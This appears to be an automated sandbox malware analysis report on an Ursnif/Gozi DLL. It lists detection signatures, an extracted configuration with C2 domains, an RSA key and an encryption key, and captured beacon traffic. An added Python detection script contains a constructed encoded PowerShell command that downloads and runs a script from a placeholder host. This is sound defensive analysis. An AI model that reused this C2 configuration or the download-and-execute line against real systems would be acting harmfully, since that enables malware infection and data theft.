Windows Analysis Report worVoBJYGD.dll

Overview

General Information

Sample Name: worVoBJYGD.dll
Analysis ID: 458873
MD5: 2f3c83a9b7d37b99c603a28d09c74cc6
SHA1: 697235d82ea9218b2349cb1055276a1ebe96aefd
SHA256: 68ab9c658f136782ec8e341d0ad8257989689882cfc03db4cdf719b3a68c8e85
Tags: dll, Gozi, ISFB, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://gtr.antoinfer.com/FXZ4lJvs/pnPhoUboMRVeoTe_2BxFQHV/VrMabiiED1/fjSHMBnhaHvqGkBru/BBTTQ6QwiwG2/i_2B4XLvHY3/zQLJ0W4RRFNlvQ/B3u_2FSgrcZQDj_2BbFWa/Bx8WB7z_2BuLUgre/PCgyAB0W6V5ZAPj/EUhKDrtuQoVEfKF_2F/dcW7lxG1t/oqJkrgpYdakzYVLuFura/45KMjCH_2BPWhKVH2At/F3l8q550AYqbFa84glQVmt/K2gCe0Lr0TKfs/y_2FaOCB/ygw2OjZ6hu69MXjNR4EuLCN/Av5n84Tspg/9rzu_2F5EAjaDhz2A/PQ8PWyfZ/9t_2F Avira URL Cloud: Label: malware
Source: http://gtr.antoinfer.com/08OjUeXqnP9/J746P5EGkluNVd/IJ_2B0pRlg5g_2Fpunyf_/2BXLVHvYLaERgrs5/6QTGZHoxYTnKCap/ZPQAuenP_2FyJ6hWxg/pWql_2F5l/kLJRoq5u3UoR4652KiHp/EmofwTCfdG6EODl70rf/KEalVhNFb6NVkmQGTmfz_2/B7kttRIp_2Bne/TjMfdOpf/19l29_2BHFRm1Q66bkvKZWZ/DZZfqXshBY/y14LEgOTtytG3Ix8L/xeX8bRPtnh6u/r2W_2BXkRqN/peDwoZDDU11DTW/WVHbt8_2BPQcYfD7tFwK0/zJnaF28QV4LV_2F7/vA9Gd_2F8SeHe3M/sh52_2Bep9d5h/oiu8Z2yw Avira URL Cloud: Label: malware
Source: http://gtr.antoinfer.com/mTRcVo1kR/Y_2FA_2BfssGFqVyATv2/Ha48GIz6nIiYpIeUH4v/_2FG2EmK4VeNaMJVBDrk0J/_2B1TzmrJnGIJ/nya_2F8I/cdZf2M97sVJPBZwkgGorhXf/mRYeY9vLlb/ql65kRpFXqGZwBQer/rXMufQHq_2FU/nIy69w6PhML/8J3AhNFQ4Jy96G/w5vhfh_2BIJ7d9IoLb98y/oKxTbr81HhqnJ1L1/Jh1VS63mbokZ6cg/EiF4xFifMJVfOHV2Q_/2FlZvyJ76/jzog_2BoRPm_2FGOWmRI/FPnBmD_2BoCBmqUOVLw/rpKEm_2F86qO2njAFbe3qJ/1v9sWMzqblkv_/2F_2BDgW007d7/LtA8 Avira URL Cloud: Label: malware
Source: http://gtr.antoinfer.com/DeX5GWZg0Peq/7NgceSVLwb_/2FKBdrhD_2BrPB/8c1uiDVblu0VRxOwf86RB/7RlrJfNAcSl8yK9M/_2BR6tZsQdJK7DQ/0XeQ_2FDLrv1nAxzaB/T3xKAFAr_/2Fp4Ltq73VjaHHoQztD1/x183TFWpQzC6_2F2n_2/FW_2BJ7_2BLURkcNjyg4hv/iERXmjmDxZ_2B/MqlUCL1c/d0YTAfP_2B2t_2FpDPiA4C7/kp7kRE_2BM/6ThuCNdgd0HyvWufQ/x61l_2FymcLS/YGjjC9Byoh4/QKUChdjQOX9Lh8/tWuTsS4vrxaovoeb8MTe0/n0ug3jEb10v8CjXy/4y_2Bffi5hDHF4e/taOpwFWZ_2FIS/gE Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000000.00000002.497784812.0000000003120000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif
{
  "RSA Public Key": "XIQ66Sm6I98pcZAgIrZV1QfUYCowoyPvAE0ZGoUgS6LRMgPUz1CjzrhYfIXNK4I/5IuxCPvsPosYMGmpJAGwuiufC5ilxlpxNXjOvZf/072uMnV3R8Omqvlr+TUeswWBriIAFZY/aSr0j7JV6iJrVfwOKuYBzEzn95xd7jqdIO1IDtgQOe1zk9B/od2PHQ4N5H6FvG+U4i9V8MADwHONlD1brINCCdaaC2W6Qp9XxRnFqMgRJ11Iryex4VSd5uE7o6/Nj6obfRxYgX/9kpKybm15Tv3BHBp9AFun5vwEIvKQiP6MHnUYchwnFuWqwNNwMjcVV+KXsy8CJKXx/Cr9tXrtx3Y8jox8xHMgA2vPxVE=",
  "c2_domain": ["app.flashgameo.at", "apr.intoolkom.at", "r23cirt55ysvtdvl.onion", "gtk5.variyan.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "free.monotreener.com", "sam.notlaren.at"],
  "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"],
  "serpent_key": "rQH4gusjF0tL2dQz",
  "server": "580",
  "sleep_time": "10",
  "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600",
  "time_value": "600",
  "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240",
  "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300",
  "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240",
  "not_use(CRC_BCTIMEOUT)": "10",
  "botnet": "2500",
  "SetWaitableTimer_value": "60"
}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com Virustotal: Detection: 12%
Source: app.flashgameo.at Virustotal: Detection: 11%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D94CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 4_2_00D94CEA

Compliance:

Uses 32bit PE files
Source: worVoBJYGD.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000017.00000002.429129001.000001ED7C9D0000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.443954090.000002400C710000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.449751054.000001317AE50000.00000002.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.pdb source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.436321416.0000000004EC0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.474646332.0000000005840000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.436321416.0000000004EC0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.474646332.0000000005840000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.pdbXP source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source: Binary string: c:\922\exact-round\Example\horse\in.pdb source: loaddll32.exe, 00000000.00000002.504641313.000000006DDD0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.507786068.000000006DDD0000.00000002.00020000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.pdbXP source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.pdb source: powershell.exe, 00000013.00000002.560986791.00000204842CD000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03139386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_03139386
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0312CA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03140F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_03140F53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05380F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_05380F53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05379386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_05379386
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_0536CA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03126457 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_03126457
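The PDB paths above (Temp\fedhsvoj\fedhsvoj.pdb and Temp\senxb4p4\senxb4p4.pdb, both recovered from powershell.exe memory) are the compiler artefacts of PowerShell Add-Type: csc.exe is handed a .cmdline response file in a randomly named Temp folder, and that name is reused for the .cs, .dll and .pdb. This is the pattern behind "Sigma detected: Suspicious Csc.exe Source File Folder" and "Compiles code for process injection (via .Net compiler)" in the signature list. The following is an added example for this page, not Joe Sandbox's or the Sigma rules' own logic: process-creation checks for the mshta -> powershell -> csc.exe chain run over constructed events. The report's actual command lines are not in this section, so the csc.exe invocation and the encoded command below are approximations of that chain, and the URL and script paths in them are placeholders.

```python
r"""Process-creation checks for the mshta -> powershell -> csc.exe chain flagged in this report.
Added example for this page; not Joe Sandbox's or Sigma's own logic. All events are
constructed to mirror the report's artefacts (Temp\fedhsvoj\fedhsvoj.pdb,
Temp\senxb4p4\senxb4p4.pdb, the MSHTA / encoded-IEX signatures); none is a captured log line."""
import base64
import re
from typing import Dict, List, Optional

# Add-Type compiles via csc.exe and writes <name>.cmdline, <name>.0.cs, <name>.dll and
# <name>.pdb into %TEMP%\<name>\, folder and files sharing one random 8-character name.
ADDTYPE_ARTIFACT = re.compile(
    r"\\AppData\\Local\\Temp\\([a-z0-9]{8})\\\1(?:\.0)?\.(?:cs|cmdline|dll|pdb)$", re.I
)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def is_addtype_artifact(path: str) -> bool:
    """True for paths shaped like the compiler artefacts found in the report."""
    return ADDTYPE_ARTIFACT.search(path) is not None


def decode_encoded_command(cmd: str) -> Optional[str]:
    """UTF-16LE plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event: Dict[str, str]) -> List[str]:
    """Names of the checks that fire for one process-creation event."""
    hits: List[str] = []
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event["command_line"]
    if image in SHELLS and parent == "mshta.exe":
        hits.append("mshta_spawning_shell")
    if image in SHELLS:
        plain = decode_encoded_command(cmd)
        if plain and re.search(r"(?i)\biex\b|invoke-expression", plain):
            hits.append("encoded_iex")
    if image == "csc.exe":
        # Response/source file under the user's Temp folder: a script host compiling on the fly.
        if re.search(r"(?i)\\AppData\\Local\\Temp\\", cmd):
            hits.append("csc_temp_source_folder")
        if parent in SHELLS:
            hits.append("csc_spawned_by_shell")
    return hits


def encode_ps(script: str) -> str:
    """How -EncodedCommand payloads are built: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed events; the URL and script paths are placeholders, not from the report.
EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": "powershell.exe -nop -w hidden -enc "
                     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
                     r'@"C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline"'},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent_image": r"C:\Program Files\dotnet\dotnet.exe",
     "command_line": r'csc.exe /noconfig @"C:\src\App\obj\Debug\App.csproj.rsp"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(f'{basename(ev["parent_image"])} -> {basename(ev["image"])}: {evaluate(ev)}')
```

The folder-equals-filename backreference in is_addtype_artifact is what separates Add-Type output from an ordinary build dropping a .pdb in a project folder; a csc.exe started by a build tool with a response file outside Temp (the third event) raises nothing, while the first two events reproduce the MSHTA-spawns-shell, encoded-IEX and Temp-source-folder hits the report lists.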

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49722 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49722 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49723 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49723 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49724 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49724 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49725 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49726 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49726 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49727 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49727 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49738 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49738 -> 185.228.233.17:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ITOS-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /FXZ4lJvs/pnPhoUboMRVeoTe_2BxFQHV/VrMabiiED1/fjSHMBnhaHvqGkBru/BBTTQ6QwiwG2/i_2B4XLvHY3/zQLJ0W4RRFNlvQ/B3u_2FSgrcZQDj_2BbFWa/Bx8WB7z_2BuLUgre/PCgyAB0W6V5ZAPj/EUhKDrtuQoVEfKF_2F/dcW7lxG1t/oqJkrgpYdakzYVLuFura/45KMjCH_2BPWhKVH2At/F3l8q550AYqbFa84glQVmt/K2gCe0Lr0TKfs/y_2FaOCB/ygw2OjZ6hu69MXjNR4EuLCN/Av5n84Tspg/9rzu_2F5EAjaDhz2A/PQ8PWyfZ/9t_2F HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /xeokJbRqOl3gRd/X3OYN3TXIyfP1rKJadFox/hkDEMFqGc3z5N0jb/OSe88cYQHbyuSyF/L_2BGXtQlRaEWOYgGy/iGe9pg_2B/kC4LmyHng_2FvJ1rpXvU/r_2BZHx4cR2W2aSgMrL/JfmqfENA8zSGFufIIE0hzo/19OQbirroLXoz/7woD_2Fn/PEok8EnxPZROEqPbm_2BBd4/HH8ql3GbQ8/5Mk8GmbHI0E_2BK8q/0FGuRwkqUf0g/VJJie0BY_2B/zf4uXegc1oUq1M/kGjn1PvLWjrBuIQHmv_2B/3Va8kJS9ZeQUj30z/_2FoWBI8OFd1rcBCCFd/6 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /DeX5GWZg0Peq/7NgceSVLwb_/2FKBdrhD_2BrPB/8c1uiDVblu0VRxOwf86RB/7RlrJfNAcSl8yK9M/_2BR6tZsQdJK7DQ/0XeQ_2FDLrv1nAxzaB/T3xKAFAr_/2Fp4Ltq73VjaHHoQztD1/x183TFWpQzC6_2F2n_2/FW_2BJ7_2BLURkcNjyg4hv/iERXmjmDxZ_2B/MqlUCL1c/d0YTAfP_2B2t_2FpDPiA4C7/kp7kRE_2BM/6ThuCNdgd0HyvWufQ/x61l_2FymcLS/YGjjC9Byoh4/QKUChdjQOX9Lh8/tWuTsS4vrxaovoeb8MTe0/n0ug3jEb10v8CjXy/4y_2Bffi5hDHF4e/taOpwFWZ_2FIS/gE HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /xpQtxUX3h_2FQKxJhfUx/G0zs_2BNyFnX7DIXqIv/lnFizf7MXIsO8WrV7iWZn_/2BjQPC7zwHzVS/342TzGfK/2qMhdDtEUWr3PuMULGHY7Wo/oH2PWiLOuv/rVab55pGcs3BjCEFy/fjf5J0mtPw74/bUga6aKy9a0/8sjdMu3LKL0W9F/lJKdHZn6kyKDin_2BwMdR/Co0bi6iqwKADh3im/EkdX1PzjugiiFzL/eq7opWWHrRFIO6DADe/KGFblEs7Y/dlX3yYwk_2BuqKiUtLfZ/ayAcx2n0s2knyq63tAp/4ZU8TWhq99lb0QUr9JY6xW/K9imquPwClp_2Bwu/6UIrfdf HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /08OjUeXqnP9/J746P5EGkluNVd/IJ_2B0pRlg5g_2Fpunyf_/2BXLVHvYLaERgrs5/6QTGZHoxYTnKCap/ZPQAuenP_2FyJ6hWxg/pWql_2F5l/kLJRoq5u3UoR4652KiHp/EmofwTCfdG6EODl70rf/KEalVhNFb6NVkmQGTmfz_2/B7kttRIp_2Bne/TjMfdOpf/19l29_2BHFRm1Q66bkvKZWZ/DZZfqXshBY/y14LEgOTtytG3Ix8L/xeX8bRPtnh6u/r2W_2BXkRqN/peDwoZDDU11DTW/WVHbt8_2BPQcYfD7tFwK0/zJnaF28QV4LV_2F7/vA9Gd_2F8SeHe3M/sh52_2Bep9d5h/oiu8Z2yw HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /mTRcVo1kR/Y_2FA_2BfssGFqVyATv2/Ha48GIz6nIiYpIeUH4v/_2FG2EmK4VeNaMJVBDrk0J/_2B1TzmrJnGIJ/nya_2F8I/cdZf2M97sVJPBZwkgGorhXf/mRYeY9vLlb/ql65kRpFXqGZwBQer/rXMufQHq_2FU/nIy69w6PhML/8J3AhNFQ4Jy96G/w5vhfh_2BIJ7d9IoLb98y/oKxTbr81HhqnJ1L1/Jh1VS63mbokZ6cg/EiF4xFifMJVfOHV2Q_/2FlZvyJ76/jzog_2BoRPm_2FGOWmRI/FPnBmD_2BoCBmqUOVLw/rpKEm_2F86qO2njAFbe3qJ/1v9sWMzqblkv_/2F_2BDgW007d7/LtA8 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /p0mrlA_2F3nwmuOO5YjXTbA/cd8IEyE4_2/FI8A_2FRC5apSNIFU/7NfGVV9uGpRL/s6DAoaMbBtN/eYfp7C4d_2F3Is/s4XG4SPnRiQ7lPcEUOZTG/dYTbEto_2F1qrOzS/I0vg3Aj3uP5f_2F/4uoaP31e5KEGdC1u9L/oWhwQd6oE/Nvhp83GHi3mH9zcVaKW0/JwD5AHcQxGrogNbSOUn/soZuo4elXh3sevhCFwKNDb/LefWHBaTOp39g/WKwxmRdA/L1LsDG1W8J3kilFzwHSP3cM/ofk_2BkzS2/fYG6a0xp2L0bHH9qT/VzjD_2B4vW7z/v2KCn HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: app.flashgameo.at
Source: global traffic HTTP traffic detected: POST /OiT_2FirHnJjoHi9Wz9/lRYYufFMTul_2B_2BY5CkW/SD8SHNDbwgWIv/CzkJRl4V/2qlIA9Op7QeGDe_2FdwjIV7/xPEy8vzfH2/VxoY4K2lc_2FXWXvK/mDsSgC08BTqd/mqIKDTZ_2F9/kA8vkXWNOd488F/ErqgFvCrl5Yz6usP1jvws/BevN_2BeaMhEHvMh/FRgus9uETEHjdsv/FSZwcCE4sYXuHvntAo/tvQ8Ok9Ns/ghPnWtwC3QyjsPH942Uo/R1DuZ1r1nnC3Zyx8YUp/2fidg_2Fh8kkAMOPis4sXs/5aKWUUxdSRpaI/n_2FzGZTe/pJ3zVp HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 | Content-Length: 2 | Host: app.flashgameo.at
Source: unknown DNS traffic detected: queries for: gtr.antoinfer.com
Source: unknown HTTP traffic detected: POST /OiT_2FirHnJjoHi9Wz9/lRYYufFMTul_2B_2BY5CkW/SD8SHNDbwgWIv/CzkJRl4V/2qlIA9Op7QeGDe_2FdwjIV7/xPEy8vzfH2/VxoY4K2lc_2FXWXvK/mDsSgC08BTqd/mqIKDTZ_2F9/kA8vkXWNOd488F/ErqgFvCrl5Yz6usP1jvws/BevN_2BeaMhEHvMh/FRgus9uETEHjdsv/FSZwcCE4sYXuHvntAo/tvQ8Ok9Ns/ghPnWtwC3QyjsPH942Uo/R1DuZ1r1nnC3Zyx8YUp/2fidg_2Fh8kkAMOPis4sXs/5aKWUUxdSRpaI/n_2FzGZTe/pJ3zVp HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 | Content-Length: 2 | Host: app.flashgameo.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 03 Aug 2021 18:27:51 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Vary: Accept-Encoding | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: loaddll32.exe, 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, control.exe, 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, control.exe, 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000013.00000003.431870631.00000204EF5B0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, control.exe, 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
